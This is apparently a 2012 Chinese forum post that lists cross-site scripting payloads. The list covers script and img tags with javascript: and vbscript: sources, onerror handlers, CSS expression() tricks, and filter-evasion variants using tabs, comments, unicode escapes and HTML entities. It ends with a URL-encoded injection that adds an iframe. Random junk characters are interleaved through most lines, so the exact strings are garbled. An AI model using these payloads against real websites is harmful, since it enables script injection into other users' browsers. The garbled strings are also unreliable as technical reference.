<script>alert("跨站")</script> (最常用)' H- \1 _) I9 J
<img scr=javascript:alert("跨站")></img>4 ` J3 A0 M( H) c c- C
<img scr="javascript: alert(/跨站/)></img>
- b7 `" Y7 T% h$ [! {/ f: M<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)! T* C9 C6 u; X+ n' ?
<img scr="#" onerror=alert(/跨站/)></img>
( b) A6 v0 m2 q1 N' M) B<img scr="#" style="xss:expression(alert(/xss/));"></img>
3 f: G. K1 \# L& c3 S2 J6 Z8 ~<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). j9 q( M: ]; ~2 q
<img src=vbscript:msgbox ("xss")></img>
+ B/ G7 e; s! d+ M<style> input {left:expression (alert('xss'))}</style>
2 z" o2 j6 p9 E& J5 K9 o/ t' ?<div style={left:expression (alert('xss'))}></div>
; O0 j2 d0 Y7 d/ \+ `" C<div style={left:exp/* */ression (alert('xss'))}></div>
: \/ E! D! L1 R. a1 w. d! w5 M<div style={left:\0065\0078ression (alert('xss'))}></div>
) }- z4 u9 T7 S3 _) c) }html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>5 F8 S8 n0 T- L/ ~0 h* ~
unicode <div style="{left:expRessioN (alert('xss'))}">
L; {7 h- W7 F7 c0 @
# a+ o. I8 C7 d) C4 p"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
2 D) N% U" o7 @( m B) x$ z$ _- m |
发表于 2012-9-15 14:09:13
收藏
支持
反对